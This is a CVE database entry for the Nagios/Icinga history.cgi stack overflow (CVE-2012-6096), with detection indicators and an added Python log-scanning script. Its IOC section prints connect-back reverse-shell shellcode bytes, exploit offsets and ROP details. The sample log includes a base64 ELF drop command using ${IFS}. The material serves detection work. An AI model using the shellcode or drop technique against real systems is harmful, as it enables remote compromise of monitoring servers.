cvebase
CVE-2012-6096
published 2013-01-22


Priority: P2 (71, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit available
EPSS: 66.45% (99.2nd percentile)
Multiple stack-based buffer overflows in the get_history function in history.cgi in Nagios Core before 3.4.4, and Icinga 1.6.x before 1.6.2, 1.7.x before 1.7.4, and 1.8.x before 1.8.4, might allow remote attackers to execute arbitrary code via a long (1) host_name variable (host parameter) or (2) svc_description variable.

Affected

The page listed 29 version ranges (25 shown), almost all without version data; collapsed here to the ranges the description states.

Vendor   Product   Version range     Fixed in
icinga   icinga    1.6.x < 1.6.2     1.6.2
icinga   icinga    1.7.x < 1.7.4     1.7.4
icinga   icinga    1.8.x < 1.8.4     1.8.4
nagios   nagios    <= 3.4.3          3.4.4

Detection & IOCs (extracted from sources)

path: /nagios3/cgi-bin/history.cgi
path: /cgi-bin/history.cgi
bytes (x86 Linux shellcode from the public exploit: socket, connect back, dup2 the socket over stdin/stdout/stderr, execve /bin//sh; the callback address and port are hardcoded in the bytes and will differ per attacker):
31c031db31c951b10651b10151b10251 89e1b301b066cd8089c231c031c95151 68badc0ded6668b0efb102665189e7b3 1053575289e1b303b066cd8031c939c1 740631c0b001cd8031c0b03f89d3cd80 31c0b03f89d3b101cd8031c0b03f89d3 b102cd8031c031d250686e2f7368682f 2f626989e3505389e1b00bcd8031c0b0 01cd80
  • Monitor HTTP GET requests to history.cgi with an oversized 'host' parameter (far longer than any legitimate hostname); this is the primary exploitation vector for the stack-based buffer overflow.
  • Detect exploitation attempts by looking for base64-encoded ELF payloads in the 'host' GET parameter of requests to history.cgi, typically piped through base64 -d and written to /tmp with tee.
  • Detect use of ${IFS} in the 'host' CGI parameter; exploits use it as a space-bypass technique for the command string passed to system().
  • Alert on requests to history.cgi that carry HTTP Basic Authentication and an abnormally long 'host' query parameter (the public exploit overwrites the return address at offsets 0xc37–0xc43 bytes into the parameter, followed by the ROP chain).
  • The exploit requires at least one ALERT entry to be present in the Nagios history page; treat GET requests to history.cgi without a host parameter from unusual clients as reconnaissance.
  • The ROP-based exploit targets specific Nagios binary builds; the hardcoded addresses (unescape, popret, hostbuf, system@PLT) are only valid for the listed target packages and will not work against binaries compiled with ASLR/PIE.
  • On distributions with SSP and FORTIFY_SOURCE enabled (e.g. Red Hat/CentOS), the overflow is not believed to be exploitable for RCE and results only in denial of service to the sending user.
  • Payload space is constrained to 200 bytes by a length limit on the system() parameter; the payload is base64-encoded to avoid bad characters.
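The indicators above, applied to web-server access logs, as an added example: this is not code from the page's sources or from the Nagios/Icinga projects. It parses combined-format log lines, keeps only requests to history.cgi, and reports which indicators fire: no host parameter (reconnaissance), an oversized host value, an oversized value from an authenticated user, ${IFS} as a space substitute, a base64-encoded ELF (base64 of the ELF magic starts with "f0VMR"), and the base64 -d / tee /tmp drop pattern. The 255-byte threshold, the log lines and the client addresses are constructed for illustration.

```python
"""Detection pass for CVE-2012-6096 exploitation attempts against history.cgi.

Added example, not from the page's sources or the Nagios/Icinga projects.
Input is Apache/nginx combined-format access log lines; sample lines below
are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# combined log: client ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed threshold: a real Nagios host_name is a hostname or FQDN, so
# anything past the 255-byte DNS limit has no benign reason to appear here.
MAX_HOST_LEN = 255

# base64 of the ELF magic b"\x7fELF" always begins with this prefix.
B64_ELF_PREFIX = "f0VMR"


def analyse_request(target, user="-"):
    """Return the set of indicator names triggered by one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/history.cgi"):
        return set()
    params = parse_qs(parts.query, keep_blank_values=True)
    hosts = params.get("host", [])
    signals = set()
    if not hosts:
        # The exploit first fetches the page to confirm an ALERT entry exists.
        signals.add("probe_no_host")
        return signals
    for host in hosts:
        if len(host) > MAX_HOST_LEN:
            signals.add("oversized_host")
            if user != "-":
                # Basic-auth user present on an oversized host: the exploit
                # authenticates as a CGI user before sending the overflow.
                signals.add("authenticated_overflow")
        if "${IFS}" in host:
            signals.add("ifs_space_bypass")
        if B64_ELF_PREFIX in host:
            signals.add("base64_elf_payload")
        # Normalise the space-bypass so the drop pattern matches either form.
        cmd = host.replace("${IFS}", " ")
        if re.search(r"base64\s+-d", cmd) and re.search(r"tee\s+/tmp/", cmd):
            signals.add("drop_to_tmp")
    return signals


def scan_log(lines):
    """Return (line_number, client, sorted indicators) for every line that fires."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        signals = analyse_request(m.group("target"), m.group("user"))
        if signals:
            hits.append((n, m.group("client"), sorted(signals)))
    return hits


# Constructed sample log: one benign lookup, one recon fetch, one attempt
# using the offsets cited above (0xc40 bytes of padding), one unrelated CGI.
SAMPLE_LOG = [
    '10.0.0.5 - nagiosadmin [22/Jan/2013:10:00:01 +0000] '
    '"GET /nagios3/cgi-bin/history.cgi?host=web01 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - nagiosadmin [22/Jan/2013:10:00:02 +0000] '
    '"GET /nagios3/cgi-bin/history.cgi HTTP/1.1" 200 18231 "-" "python-urllib/2.7"',
    '203.0.113.9 - nagiosadmin [22/Jan/2013:10:00:03 +0000] '
    '"GET /nagios3/cgi-bin/history.cgi?host=' + "A" * 0xc40
    + 'echo${IFS}f0VMRgEBAQAAAAAA|base64${IFS}-d|tee${IFS}/tmp/x HTTP/1.1" '
    '500 0 "-" "curl/7.26.0"',
    '10.0.0.7 - nagiosadmin [22/Jan/2013:10:00:04 +0000] '
    '"GET /nagios3/cgi-bin/status.cgi?host=all HTTP/1.1" 200 40211 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, client, signals in scan_log(SAMPLE_LOG):
        print(f"line {n} from {client}: {', '.join(signals)}")
```

Run it against the real access log with `scan_log(open(path).read().splitlines())`. Two caveats: the web server may reject or truncate a request line this long before the CGI sees it (Apache answers 414 beyond LimitRequestLine), so also check the error log, and a 500 status with an oversized host on a hardened build is the denial-of-service case described above rather than proof of code execution.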